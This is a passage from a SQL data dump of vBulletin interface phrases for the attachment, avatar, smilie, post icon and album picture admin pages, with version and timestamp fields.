Reading from {1}', 'vbulletin', '', 0, ''), (32491, -1, 'adding_multiple_post_icons_reading_from_x', 'attachment_image', 'Adding Multiple Post Icons Reading from {1}', 'vbulletin', '', 0, ''), (32492, -1, 'adding_multiple_smilies_reading_from_x', 'attachment_image', 'Adding Multiple Smilies Reading from {1}', 'vbulletin', '', 0, ''), (32493, -1, 'album_picture_manager', 'attachment_image', 'Album Picture Manager', 'vbulletin', 'vBulletin Solutions', 1192539113, '3.7.0 Beta 1'), (32494, -1, 'album_pictures', 'attachment_image', 'Album Pictures', 'vbulletin', 'vBulletin Solutions', 1192538438, '3.7.0 Beta 1'), (32495, -1, 'album_pictures_currently_file_system_with_thumb', 'attachment_image', 'Album pictures are currently being stored in the file system with direct access to thumbnails', 'vbulletin', 'vBulletin Solutions', 1192539984, '3.7.0 Beta 1'), (32496, -1, 'album_pictures_currently_file_system_without_thumb', 'attachment_image', 'Album pictures are currently being stored in the file system without direct access to thumbnails', 'vbulletin', 'vBulletin Solutions', 1192540007, '3.7.0 Beta 1'), (32497, -1, 'album_pictures_currently_in_database', 'attachment_image', 'Album pictures are currently being stored in the database', 'vbulletin', 'vBulletin Solutions', 1192539798, '3.7.0 Beta 1'), (32498, -1, 'are_you_sure_want_to_delete_avatar_x', 'attachment_image', 'Are you sure you want to delete the avatar called \'{1}\'?
({2}: {3})

{4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1173955882, '3.6.6'), (32499, -1, 'are_you_sure_want_to_delete_post_icon_x', 'attachment_image', 'Are you sure you want to delete the post icon called \'{1}\'?
({2}: {3})

{4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1173955882, '3.6.6'), (32500, -1, 'are_you_sure_want_to_delete_smilie_x', 'attachment_image', 'Are you sure you want to delete the smilie called \'{1}\'?
({2}: {3})

{4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1173955882, '3.6.6'), (32501, -1, 'are_you_sure_you_want_to_delete_the_attachment_type_x', 'attachment_image', 'Are you sure you want to delete the attachment type: \'{1}\'?', 'vbulletin', '', 0, ''), (32502, -1, 'are_you_sure_you_want_to_delete_the_attachment_x', 'attachment_image', 'Are you sure you want to delete the attachment: \'{1}\'?', 'vbulletin', '', 0, ''), (32503, -1, 'are_you_sure_you_want_to_delete_the_avatar_category_called_x', 'attachment_image', 'Are you sure you want to delete the avatar category called: \'{1}\'?\r\n

\r\nDelete all Avatars from this category? Yes No

If you do not want to delete all Avatars from this category, they will all be moved to the category selected below.

Destination Category: ', 'vbulletin', '', 0, ''), (32504, -1, 'are_you_sure_you_want_to_delete_the_post_icon_category_called_x', 'attachment_image', 'Are you sure you want to delete the post icon category called: \'{1}\'?

Delete all Post Icons from this category? Yes No

If you do not want to delete all Post Icons from this category, they will all be moved to the category selected below.

Destination Category: ', 'vbulletin', '', 0, ''), (32505, -1, 'are_you_sure_you_want_to_delete_the_smilie_category_called_x', 'attachment_image', 'Are you sure you want to delete the Smilie category called: \'{1}\'?

Delete all Smilies from this category? Yes No

If you do not want to delete all Smilies from this category, they will all be moved to the category selected below.

Destination Category: ', 'vbulletin', '', 0, ''), (32506, -1, 'are_you_sure_you_want_to_delete_these_attachments', 'attachment_image', 'Are you sure you want to delete these attachments?', 'vbulletin', '', 0, ''), (32507, -1, 'attached_after', 'attachment_image', 'Attached After (yyyy-mm-dd hh:mm:ss)', 'vbulletin', '', 0, ''), (32508, -1, 'attached_before', 'attachment_image', 'Attached Before (yyyy-mm-dd hh:mm:ss)', 'vbulletin', '', 0, ''), (32509, -1, 'attached_by', 'attachment_image', 'Attached By (username)', 'vbulletin', '', 0, ''), (32510, -1, 'attachment_file_path_dfn', 'attachment_image', 'Attachment File PathThis file path should be readable AND writeable by your web server (usually chmod 0777)', 'vbulletin', '', 0, ''), (32511, -1, 'attachment_is_visible', 'attachment_image', 'Attachment is Visible', 'vbulletin', '', 0, ''), (32512, -1, 'attachment_manager', 'attachment_image', 'Attachment Manager', 'vbulletin', '', 0, ''), (32513, -1, 'attachment_permissions', 'attachment_image', 'Attachment Permissions', 'vbulletin', 'vBulletin Solutions', 1148069742, '3.6.0 Beta 1'), (32514, -1, 'attachment_permissions_manager', 'attachment_image', 'Attachment Permissions Manager', 'vbulletin', 'vBulletin Solutions', 1220017052, '3.8.0 Alpha 1'), (32515, -1, 'attachment_removal', 'attachment_image', 'We have completed moving attachments to the filesystem. Presently, the attachments still remain in the database and are being read from there. If you are sure that the process completed without incident, go ahead and select yes below to remove the attachments from the database. This step cannot be reversed and may take a few minutes depending on the size of your database. Please be patient.

\r\nAttachments in Database: {1}
\r\nTotal Attachments Processed: {2}

\r\nThe above two values should be the same!

\r\nNumber of Attachments that could not be created or are 0 bytes: {3}
\r\nThe above value should be 0! Having 0 byte attachments is not uncommon so a few is nothing to worry about but if the number equals the number of attachments in the database then DO NOT FINALIZE this step or you will lose all of your attachments.', 'vbulletin', '', 0, ''), (32516, -1, 'attachment_type', 'attachment_image', 'Attachment Type', 'vbulletin', '', 0, ''), (32517, -1, 'attachmentid_start_at', 'attachment_image', 'Attachmentid to start at:Set this if you have partially completed a conversion. You should start at 0 to insure an error free transfer.', 'vbulletin', '', 0, ''), (32518, -1, 'attachments_are_currently_being_stored_in_the_database', 'attachment_image', 'Attachments are currently being stored in the database', 'vbulletin', '', 0, ''), (32519, -1, 'attachments_are_currently_being_stored_in_the_filesystem_at_x', 'attachment_image', 'Attachments are currently being stored in the filesystem at {1}', 'vbulletin', '', 0, ''), (32520, -1, 'attachments_to_show_per_page', 'attachment_image', 'Attachments to Show Per Page', 'vbulletin', '', 0, ''), (32521, -1, 'avatar', 'attachment_image', 'Avatar', 'vbulletin', '', 0, ''), (32522, -1, 'avatar_category', 'attachment_image', 'Avatar Category', 'vbulletin', '', 0, ''), (32523, -1, 'avatar_file_path', 'attachment_image', 'Avatar File Path', 'vbulletin', '', 0, ''), (32524, -1, 'avatar_file_path_dfn', 'attachment_image', 'Avatar File PathThis file path should be readable AND writeable by your web server (usually chmod 0777)', 'vbulletin', '', 0, ''), (32525, -1, 'avatar_manager', 'attachment_image', 'Avatar Manager', 'vbulletin', '', 0, ''), (32526, -1, 'avatar_permissions', 'attachment_image', 'Avatar Permissions', 'vbulletin', '', 0, ''), (32527, -1, 'avatars_are_currently_being_served_from_the_filesystem_at_x', 'attachment_image', 'Avatars are currently being served from the filesystem at {1}', 'vbulletin', '', 0, ''), (32528, -1, 'avatars_deleted', 'attachment_image', 'Avatars Deleted', 'vbulletin', '', 0, ''), (32529, -1, 'avatars_file_path', 'attachment_image', 'Avatars File Path', 'vbulletin', '', 0, ''), (32530, -1, 'avatars_to_show_per_page', 'attachment_image', 'Avatars to Show Per Page', 'vbulletin', '', 0, ''), (32531, -1, 'average_attachment_filesize', 'attachment_image', 'Average Attachment Filesize', 'vbulletin', '', 0, ''), (32532, -1, 'can_use_this_avatar_category', 'attachment_image', 'Can Use This Avatar Category', 'vbulletin', '', 0, ''), (32533, -1, 'can_use_this_extension', 'attachment_image', 'Can use this extension', 'vbulletin', 'vBulletin Solutions', 1148070857, '3.6.0 Beta 1'), (32534, -1, 'can_use_this_post_icon_category', 'attachment_image', 'Can Use This Post Icon Category', 'vbulletin', '', 0, ''), (32535, -1, 'can_use_this_smilie_category', 'attachment_image', 'Can Use This Smilie Category', 'vbulletin', '', 0, ''), (32536, -1, 'confirm_attachment_removal', 'attachment_image', 'Confirm Attachment Removal', 'vbulletin', '', 0, ''), (32537, -1, 'confirm_deletion_of_attachment_type_x', 'attachment_image', 'Confirm Deletion of Attachment Type: {1}', 'vbulletin', '', 0, ''), (32538, -1, 'confirm_deletion_of_avatar_category_x', 'attachment_image', 'Confirm Deletion of Avatar Category: {1}', 'vbulletin', '', 0, ''), (32539, -1, 'confirm_deletion_of_post_icon_category_x', 'attachment_image', 'Confirm Deletion of Post Icon Category: {1}', 'vbulletin', '', 0, ''), (32540, -1, 'confirm_deletion_of_smilie_category_x', 'attachment_image', 'Confirm Deletion of Smilie Category: {1}', 'vbulletin', '', 0, ''), (32541, -1, 'confirm_picture_data_removal', 'attachment_image', 'Confirm Picture Data Removal', 'vbulletin', 'vBulletin Solutions', 1192539199, '3.7.0 Beta 1'), (32542, -1, 'contains', 'attachment_image', 'Contains', 'vbulletin', '', 0, ''), (32543, -1, 'custom_attachment_permissions', 'attachment_image', 'Custom Attachment Permissions', 'vbulletin', 'vBulletin Solutions', 1148072057, '3.6.0 Beta 1'), (32544, -1, 'delete_selected_attachments', 'attachment_image', 'Delete Selected Attachments', 'vbulletin', '', 0, ''), (32545, -1, 'disk_space_used', 'attachment_image', 'Disk Space Used', 'vbulletin', '', 0, ''), (32546, -1, 'downloads', 'attachment_image', 'Downloads', 'vbulletin', '', 0, ''), (32547, -1, 'downloads_greater_than', 'attachment_image', 'More Than X Downloads', 'vbulletin', '', 0, ''), (32548, -1, 'downloads_less_than', 'attachment_image', 'Less Than X Downloads', 'vbulletin', '', 0, ''), (32549, -1, 'edit_attachment', 'attachment_image', 'Edit Attachment', 'vbulletin', '', 0, ''), (32550, -1, 'edit_attachment_permissions_for_usergroup_x_in_extension_y', 'attachment_image', 'Edit Attachment Permissions For Usergroup:
{1} in Extension {2}', 'vbulletin', 'vBulletin Solutions', 1148070810, '3.6.0 Beta 1'), (32551, -1, 'edit_avatar_categories', 'attachment_image', 'Edit Avatar Categories', 'vbulletin', '', 0, ''), (32552, -1, 'edit_post_icon_categories', 'attachment_image', 'Edit Post Icon Categories', 'vbulletin', '', 0, ''), (32553, -1, 'edit_smilie_categories', 'attachment_image', 'Edit Smilie Categories', 'vbulletin', '', 0, ''), (32554, -1, 'edit_storage_type', 'attachment_image', 'Edit Storage Type', 'vbulletin', '', 0, ''), (32555, -1, 'extension', 'attachment_image', 'Extension', 'vbulletin', '', 0, ''), (32556, -1, 'file_removal', 'attachment_image', 'Attachments in Database: {1}
\r\nTotal Attachments Processed: {2}

\r\nThe above two values should be the same!

\r\nNumber of Attachments that could not be read or are 0 bytes: {3}

\r\nWe have completed moving attachments to the database. Presently, the attachments still remain in the filesystem but are being read from the database.\r\nIf you are sure that the process completed without incident, go ahead and select yes below to remove the attachments from the filesystem.

\r\nThis step cannot be reversed and may take a few minutes depending on the number of attachments. Please be patient.

\r\nWe will only be able to remove attachments and attachment directories that we have write permission to. Normally this should be every attachment\r\nbut sometimes the permissions are not correct and the removal will fail. You will need to manually remove the attachments from the filesystem\r\nin this event.', 'vbulletin', '', 0, ''), (32557, -1, 'filesize', 'attachment_image', 'Filesize', 'vbulletin', '', 0, ''), (32558, -1, 'filesize_greater_than', 'attachment_image', 'Filesize Greater Than (bytes)', 'vbulletin', '', 0, ''), (32559, -1, 'filesize_less_than', 'attachment_image', 'Filesize Less Than (bytes)', 'vbulletin', '', 0, ''), (32560, -1, 'filetype', 'attachment_image', 'filetype', 'vbulletin', '', 0, ''), (32561, -1, 'finalize', 'attachment_image', 'Finalize', 'vbulletin', '', 0, ''), (32562, -1, 'find_all_attachments_older_than_days', 'attachment_image', 'Find All Attachments Older Than X Days', 'vbulletin', '', 0, ''), (32563, -1, 'five_largest_attachments', 'attachment_image', 'Five Largest Attachments', 'vbulletin', '', 0, ''), (32564, -1, 'five_most_popular_attachments', 'attachment_image', 'Five Most Popular Attachments', 'vbulletin', '', 0, ''), (32565, -1, 'five_users_most_attachment_space', 'attachment_image', 'Five Users Whose Attachments Take Up the Most Space', 'vbulletin', '', 0, ''), (32566, -1, 'full_picture_file_path', 'attachment_image', 'Full Picture File Path\r\nThis file path should be readable AND writeable by your web server (usually chmod 0777)', 'vbulletin', 'vBulletin Solutions', 1192538940, '3.7.0 Beta 1'), (32567, -1, 'full_pictures', 'attachment_image', 'Full Pictures', 'vbulletin', 'vBulletin Solutions', 1192539162, '3.7.0 Beta 1'), (32568, -1, 'function_rebuilds_album_picture_thumbs', 'attachment_image', 'This function rebuilds the album picture thumbnails. It is needed when you change thumbnail dimensions or quality.', 'vbulletin', 'vBulletin Solutions', 1192540457, '3.7.0 Beta 1'), (32569, -1, 'images_are_currently_being_served_from_the_database', 'attachment_image', 'Images are currently being served from the database', 'vbulletin', '', 0, ''), (32570, -1, 'keep_pictures_file_system_allow_thumb', 'attachment_image', 'Keep pictures in file system, but allow direct access to thumbnails', 'vbulletin', 'vBulletin Solutions', 1192539917, '3.7.0 Beta 1'), (32571, -1, 'keep_pictures_file_system_disable_thumb', 'attachment_image', 'Keep pictures in file system, but disallow direct access to thumbnails', 'vbulletin', 'vBulletin Solutions', 1192539871, '3.7.0 Beta 1'), (32572, -1, 'max_height_dfn', 'attachment_image', 'Maximum Height(in pixels, 600 for example)

This only applies to image files of the extensions: bmp, gif, jpe, jpg, jpeg, png, psd, tif and tiff.
', 'vbulletin', '', 0, ''), (32573, -1, 'max_width_dfn', 'attachment_image', 'Maximum Width(in pixels, 800 for example)

This only applies to image files of the extensions: bmp, gif, jpe, jpg, jpeg, png, psd, tif and tiff.
', 'vbulletin', '', 0, ''), (32574, -1, 'maximum_filesize', 'attachment_image', 'Maximum Filesize', 'vbulletin', '', 0, ''), (32575, -1, 'maximum_filesize_dfn', 'attachment_image', 'Max Filesize(in bytes)

There are several configuration options that limit the maximum size of uploaded files. Consult the Quick Stats on the your main Admin CP page for your current settings.
', 'vbulletin', 'vBulletin Solutions', 1205943036, '3.7.0 Release Candidate 1'), (32576, -1, 'maximum_height', 'attachment_image', 'Max Height', 'vbulletin', '', 0, ''), (32577, -1, 'maximum_width', 'attachment_image', 'Max Width', 'vbulletin', '', 0, ''), (32578, -1, 'mime_type_dfn', 'attachment_image', 'Mime Type & HeadersThis controls what your browser does with the attachment. Leave blank if you don\'t know what to put here and the user will generally be prompted to download the attachment.

This option is intended to be filled with HTTP Headers, one per line. To specify a MIME type, please use

Content-Type: type/subtype
', 'vbulletin', 'vBulletin Solutions', 1210082906, '3.7.1'), (32579, -1, 'move_avatars_to_a_different_directory', 'attachment_image', 'Move Avatars to a Different Directory', 'vbulletin', '', 0, ''), (32580, -1, 'move_items_from_database_into_filesystem', 'attachment_image', 'Move Items from Database into File System', 'vbulletin', '', 0, ''), (32581, -1, 'move_items_from_filesystem_into_database', 'attachment_image', 'Move Items from File System into Database', 'vbulletin', '', 0, ''), (32582, -1, 'move_items_to_a_different_directory', 'attachment_image', 'Move Items to a Different Directory', 'vbulletin', '', 0, ''), (32583, -1, 'move_pictures_into_database', 'attachment_image', 'Move pictures into the database', 'vbulletin', 'vBulletin Solutions', 1192539885, '3.7.0 Beta 1'), (32584, -1, 'move_pictures_into_file_system_with_thumb', 'attachment_image', 'Move pictures into the file system with direct access to thumbnails', 'vbulletin', 'vBulletin Solutions', 1192539959, '3.7.0 Beta 1'), (32585, -1, 'move_pictures_into_file_system_without_thumb', 'attachment_image', 'Move pictures into the file system without direct access to thumbnails', 'vbulletin', 'vBulletin Solutions', 1192539945, '3.7.0 Beta 1'), (32586, -1, 'move_pictures_within_file_system', 'attachment_image', 'Move pictures within the file system', 'vbulletin', 'vBulletin Solutions', 1192539846, '3.7.0 Beta 1'), (32587, -1, 'move_profilepics_to_a_different_directory', 'attachment_image', 'Move Profile Pictures to a Different Directory', 'vbulletin', '', 0, ''), (32588, -1, 'move_sigpics_to_a_different_directory', 'attachment_image', 'Move Signature Pictures to a Different Directory', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (32589, -1, 'new_window', 'attachment_image', 'New Win', 'vbulletin', '', 0, ''), (32590, -1, 'number_of_attachments_to_process_per_cycle', 'attachment_image', 'Number of attachments to process per cycle', 'vbulletin', '', 0, ''), (32591, -1, 'number_of_users_to_process_per_cycle', 'attachment_image', 'Number of Users to process per cycle', 'vbulletin', '', 0, ''), (32592, -1, 'number_pictures_per_cycle', 'attachment_image', 'Number of pictures to process per cycle', 'vbulletin', 'vBulletin Solutions', 1192538657, '3.7.0 Beta 1'), (32593, -1, 'open_in_new_window', 'attachment_image', 'Open this attachment in a new browser window?', 'vbulletin', '', 0, ''), (32594, -1, 'or_enter_a_full_url_to_a_file', 'attachment_image', 'Or enter a full URL to a file to upload', 'vbulletin', 'vBulletin Solutions', 1205939189, '3.7.0 Release Candidate 1'), (32595, -1, 'permissions_for_avatar_category_x', 'attachment_image', 'Permissions For Avatar Category {1}', 'vbulletin', '', 0, ''), (32596, -1, 'permissions_for_post_icon_category_x', 'attachment_image', 'Permissions For Post Icon Category {1}', 'vbulletin', '', 0, ''), (32597, -1, 'permissions_for_smilie_category_x', 'attachment_image', 'Permissions For Smilie Category {1}', 'vbulletin', '', 0, ''), (32598, -1, 'picture_thumbnail_file_path', 'attachment_image', 'Picture and Thumbnail File Path\r\nThis file path should be readable AND writeable by your web server (usually chmod 0777)', 'vbulletin', 'vBulletin Solutions', 1192539062, '3.7.0 Beta 1'), (32599, -1, 'pictures_moved_database_count_xyz', 'attachment_image', '

Pictures have been moved to the database. Of the {1} pictures in the database, {2} were processed. {3} had errors.

\r\n

Selecting finalize below will remove the duplicate data from the file system and begin serving pictures from the database. Any pictures that did not convert successfully will be lost.

', 'vbulletin', 'vBulletin Solutions', 1192540662, '3.7.0 Beta 1'), (32600, -1, 'pictures_moved_file_system_count_xyz', 'attachment_image', '

Pictures have been moved to the file system. Of the {1} pictures in the database, {2} were processed. {3} had errors.

\r\n

Selecting finalize below will remove the duplicate data from the database and begin serving pictures from the file system. Any pictures that did not convert successfully will be lost.

', 'vbulletin', 'vBulletin Solutions', 1192540606, '3.7.0 Beta 1'), (32601, -1, 'pictures_moved_thumbnails_disabled_count_xyz', 'attachment_image', '

Picture thumbnails have been moved and are no longer directly accessible. Of the {1} pictures in the database, {2} were processed. {3} had errors.

\r\n

Selecting finalize below will remove the duplicate data from the file system. Any thumbnails that did not convert successfully will be lost.

', 'vbulletin', 'vBulletin Solutions', 1192540720, '3.7.0 Beta 1'), (32602, -1, 'pictures_moved_thumbnails_enabled_count_xyz', 'attachment_image', '

Picture thumbnails have been moved and are now directly accessible. Of the {1} pictures in the database, {2} were processed. {3} had errors.

\r\n

Selecting finalize below will remove the duplicate data from the file system. Any thumbnails that did not convert successfully will be lost.

', 'vbulletin', 'vBulletin Solutions', 1192540787, '3.7.0 Beta 1'), (32603, -1, 'please_select_a_file_to_attach', 'attachment_image', 'Please select a file to attach by using the \"Browse...\" button.', 'vbulletin', '', 0, ''), (32604, -1, 'possible_not_enough_disk_space_finalize', 'attachment_image', '

It is possible that you might not have enough disk space in the supplied path but we are unable to determine that ahead of time.

\r\n\r\n

We will not finalize the move until the end of the process.

\r\n\r\n

If the process aborts before the end, you will need to free up space before trying again.

', 'vbulletin', 'vBulletin Solutions', 1192539544, '3.7.0 Beta 1'), (32605, -1, 'post_icon', 'attachment_image', 'Post Icon', 'vbulletin', '', 0, ''), (32606, -1, 'post_icon_category', 'attachment_image', 'Post Icon Category', 'vbulletin', '', 0, ''), (32607, -1, 'post_icon_file_path', 'attachment_image', 'Post Icon File Path', 'vbulletin', '', 0, ''), (32608, -1, 'post_icon_file_path_dfn', 'attachment_image', 'Post Icon File PathThis file path should be readable AND writeable by your web server (usually chmod 0777)', 'vbulletin', '', 0, ''), (32609, -1, 'post_icon_manager', 'attachment_image', 'Post Icon Manager', 'vbulletin', '', 0, ''), (32610, -1, 'post_icon_permissions', 'attachment_image', 'Post Icon Permissions', 'vbulletin', '', 0, ''), (32611, -1, 'post_icons_deleted', 'attachment_image', 'Post Icons Deleted', 'vbulletin', '', 0, ''), (32612, -1, 'post_icons_file_path', 'attachment_image', 'Post Icons File Path', 'vbulletin', '', 0, ''), (32613, -1, 'post_icons_to_show_per_page', 'attachment_image', 'Post Icons to Show Per Page', 'vbulletin', '', 0, ''), (32614, -1, 'processing_avatar', 'attachment_image', 'Processing Avatar', 'vbulletin', '', 0, ''), (32615, -1, 'processing_post_icon', 'attachment_image', 'Processing Post Icon', 'vbulletin', '', 0, ''), (32616, -1, 'processing_smilie', 'attachment_image', 'Processing Smilie ...', 'vbulletin', '', 0, ''), (32617, -1, 'profile_picture', 'attachment_image', 'Profile Picture', 'vbulletin', '', 0, ''), (32618, -1, 'profilepic_file_path_dfn', 'attachment_image', 'Profile Picture PathThis file path should be readable AND writeable by your web server (usually chmod 0777)', 'vbulletin', '', 0, ''), (32619, -1, 'profilepics_are_currently_being_served_from_the_filesystem_at_x', 'attachment_image', 'Profile pictures are currently being served from the filesystem at {1}', 'vbulletin', '', 0, ''), (32620, -1, 'prune_attachments', 'attachment_image', 'Prune Attachments', 'vbulletin', '', 0, ''), (32621, -1, 'read_disable_direct_access_thumbnails', 'attachment_image', 'We are ready to disable direct access to your pictures\' thumbnails.', 'vbulletin', 'vBulletin Solutions', 1192540100, '3.7.0 Beta 1'), (32622, -1, 'ready_move_pictures_file_system_options', 'attachment_image', 'We are ready to move your pictures into the file system with the options you specified.', 'vbulletin', 'vBulletin Solutions', 1192539740, '3.7.0 Beta 1'), (32623, -1, 'ready_move_pictures_into_database', 'attachment_image', 'We are ready to move your pictures into the database.', 'vbulletin', 'vBulletin Solutions', 1192540077, '3.7.0 Beta 1'), (32624, -1, 'rebuild_album_picture_thumbnails', 'attachment_image', 'Rebuild Album Picture Thumbnails', 'vbulletin', 'vBulletin Solutions', 1192539360, '3.7.0 Beta 1'), (32625, -1, 'removing_x_attachments', 'attachment_image', 'Removing {1} attachments from the database.', 'vbulletin', '', 0, ''), (32626, -1, 'removing_x_records', 'attachment_image', 'Removing {1} record(s)', 'vbulletin', 'vBulletin Solutions', 1192540414, '3.7.0 Beta 1'), (32627, -1, 'replace_attachment', 'attachment_image', 'Replace Attachment', 'vbulletin', '', 0, ''), (32628, -1, 'show_all_avatars', 'attachment_image', 'Show All Avatars', 'vbulletin', '', 0, ''), (32629, -1, 'show_all_post_icons', 'attachment_image', 'Show All Post Icons', 'vbulletin', '', 0, ''), (32630, -1, 'show_all_smilies', 'attachment_image', 'Show all Smilies', 'vbulletin', '', 0, ''), (32631, -1, 'showing_attachments_x_to_y_of_z', 'attachment_image', 'Showing Attachments {1} to {2} of {3}', 'vbulletin', 'vBulletin Solutions', 1205925440, '3.7.0 Release Candidate 1'), (32632, -1, 'sigpic_file_path_dfn', 'attachment_image', 'Signature Picture PathThis file path should be readable AND writeable by your web server (usually chmod 0777)', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (32633, -1, 'sigpics_are_currently_being_served_from_the_filesystem_at_x', 'attachment_image', 'Signature pictures are currently being served from the filesystem at {1}', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (32634, -1, 'smilie', 'attachment_image', 'Smilie', 'vbulletin', '', 0, ''), (32635, -1, 'smilie_category', 'attachment_image', 'Smilie Category', 'vbulletin', '', 0, ''), (32636, -1, 'smilie_file_path', 'attachment_image', 'Smilie File Path', 'vbulletin', '', 0, ''), (32637, -1, 'smilie_file_path_dfn', 'attachment_image', 'Smilie File PathThis file path should be readable AND writeable by your web server (usually chmod 0777)', 'vbulletin', '', 0, ''), (32638, -1, 'smilie_manager', 'attachment_image', 'Smilie Manager', 'vbulletin', '', 0, ''), (32639, -1, 'smilie_permissions', 'attachment_image', 'Smilie Permissions', 'vbulletin', '', 0, ''), (32640, -1, 'smilies_deleted', 'attachment_image', 'Smilies Deleted', 'vbulletin', '', 0, ''), (32641, -1, 'smilies_file_path', 'attachment_image', 'Smilies File Path', 'vbulletin', '', 0, ''), (32642, -1, 'smilies_to_show_per_page', 'attachment_image', 'Smilies to Show Per Page', 'vbulletin', '', 0, ''), (32643, -1, 'smilietext_x_taken', 'attachment_image', 'The replacement text {1} is already in use!', 'vbulletin', '', 0, ''), (32644, -1, 'standard_using_default_attachment_permissions', 'attachment_image', 'Standard: Using default attachment permissions', 'vbulletin', 'vBulletin Solutions', 1148069648, '3.6.0 Beta 1'), (32645, -1, 'starting_picture_id', 'attachment_image', 'Starting Picture ID', 'vbulletin', 'vBulletin Solutions', 1192538701, '3.7.0 Beta 1'), (32646, -1, 'storage_type', 'attachment_image', 'Storage Type', 'vbulletin', '', 0, ''), (32647, -1, 'text_to_replace', 'attachment_image', 'Text to Replace', 'vbulletin', '', 0, ''), (32648, -1, 'thumb', 'attachment_image', 'Thumb', 'vbulletin', '', 0, ''), (32649, -1, 'thumbnail_file_path', 'attachment_image', 'Thumbnail File Path\r\nThis file path should be readable AND writeable by your web server (usually chmod 0777)', 'vbulletin', 'vBulletin Solutions', 1192538956, '3.7.0 Beta 1'), (32650, -1, 'thumbnail_image', 'attachment_image', 'Display thumbnail for this type?This only applies to image files of the extensions: bmp, gif, jpe, jpg, jpeg, png, psd, tif and tiff. The creation of a thumbnail for any image type is not guaranteed.', 'vbulletin', '', 0, ''), (32651, -1, 'thumbnail_quality', 'attachment_image', 'Thumbnail Quality', 'vbulletin', 'vBulletin Solutions', 1192539338, '3.7.0 Beta 1'), (32652, -1, 'thumbnails', 'attachment_image', 'Thumbnails', 'vbulletin', 'vBulletin Solutions', 1192539176, '3.7.0 Beta 1'), (32653, -1, 'total_attachments', 'attachment_image', 'Total Attachments', 'vbulletin', '', 0, ''), (32654, -1, 'total_downloads', 'attachment_image', 'Total Downloads', 'vbulletin', '', 0, ''), (32655, -1, 'total_size', 'attachment_image', 'Total Size', 'vbulletin', '', 0, ''), (32656, -1, 'uncategorized', 'attachment_image', 'uncategorized', 'vbulletin', '', 0, ''), (32657, -1, 'upload_avatar', 'attachment_image', 'Upload Avatar', 'vbulletin', '', 0, ''), (32658, -1, 'upload_post_icon', 'attachment_image', 'Upload Post Icon', 'vbulletin', '', 0, ''), (32659, -1, 'upload_smilie', 'attachment_image', 'Upload Smilie', 'vbulletin', '', 0, ''), (32660, -1, 'url_to_avatars_relative_to_your_forums_home_page', 'attachment_image', 'URL to avatars (Relative to your forums home page)', 'vbulletin', '', 0, ''), (32661, -1, 'url_to_profilepics_relative_to_your_forums_home_page', 'attachment_image', 'URL to Profile Pictures (Relative to your forums home page)', 'vbulletin', '', 0, ''), (32662, -1, 'url_to_sigpics_relative_to_your_forums_home_page', 'attachment_image', 'URL to Signature Pictures(Relative to your forums home page)', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (32663, -1, 'url_to_thumbnails', 'attachment_image', 'URL to Thumbnails\r\n(relative to main forum directory)', 'vbulletin', 'vBulletin Solutions', 1192539004, '3.7.0 Beta 1'), (32664, -1, 'use_default_permissions', 'attachment_image', 'Use Default Permissions for this extension (Note: this will delete any previous custom permissions set)', 'vbulletin', 'vBulletin Solutions', 1148072303, '3.6.0 Beta 1'), (32665, -1, 'user_pictures', 'attachment_image', 'User Pictures', 'vbulletin', '', 0, ''), (32666, -1, 'userpic_manager', 'attachment_image', 'User Picture Manager', 'vbulletin', '', 0, ''), (32667, -1, 'view_attachments', 'attachment_image', 'View Attachments', 'vbulletin', '', 0, ''), (32668, -1, 'view_largest_attachments', 'attachment_image', 'View Largest Attachments', 'vbulletin', '', 0, ''), (32669, -1, 'view_most_popular_attachments', 'attachment_image', 'View Most Popular Attachments', 'vbulletin', '', 0, ''), (32670, -1, 'view_newest_attachments', 'attachment_image', 'View Newest Attachments', 'vbulletin', '', 0, ''), (32671, -1, 'view_oldest_attachments', 'attachment_image', 'View Oldest Attachments', 'vbulletin', '', 0, ''), (32672, -1, 'view_permissions', 'attachment_image', 'View Permissions', 'vbulletin', 'vBulletin Solutions', 1148058018, '3.6.0 Beta 1'), (32673, -1, 'visible', 'attachment_image', 'Visible', 'vbulletin', '', 0, ''), (32674, -1, 'we_are_ready_to_attempt_to_move_your_attachments_from_database_to_filesystem', 'attachment_image', '

We are ready to attempt to move your Attachments from the Database to the Filesystem.

It is possible that you might not have enough disk space in the supplied path but we are unable to determine that ahead of time.

We will not finalize the move until the end of the process.

If the process aborts before the end, you will need to free up space before trying again.

', 'vbulletin', '', 0, ''), (32675, -1, 'we_are_ready_to_attempt_to_move_your_attachments_from_filesystem_to_database', 'attachment_image', '

We are ready to attempt to move your Attachments from the Filesystem to the Database.

It is possible that you might not have enough space in the database but we are unable to determine that ahead of time.

We will not finalize the move until the end of the process.

If the process aborts before the end, you will need to free up space before trying again.

', 'vbulletin', '', 0, ''), (32676, -1, 'we_are_ready_to_attempt_to_move_your_images_from_database_to_filesystem', 'attachment_image', '

We are ready to attempt to move your Images from the Database to the Filesystem.

It is possible that you might not have enough disk space in the supplied path but we are unable to determine that ahead of time.

We will not finalize the move until the end of the process.

If the process aborts before the end, you will need to free up space before trying again.

', 'vbulletin', '', 0, ''), (32677, -1, 'we_are_ready_to_attempt_to_move_your_images_from_filesystem_to_database', 'attachment_image', '

We are ready to attempt to move your images from the filesystem to the database.

\r\n\r\n

It is possible that you might not have enough space in the database, but we are unable to determine that ahead of time.

\r\n\r\n

We will not finalize the move until the end of the process. If the process aborts before the end, you will need to free up space before trying again.

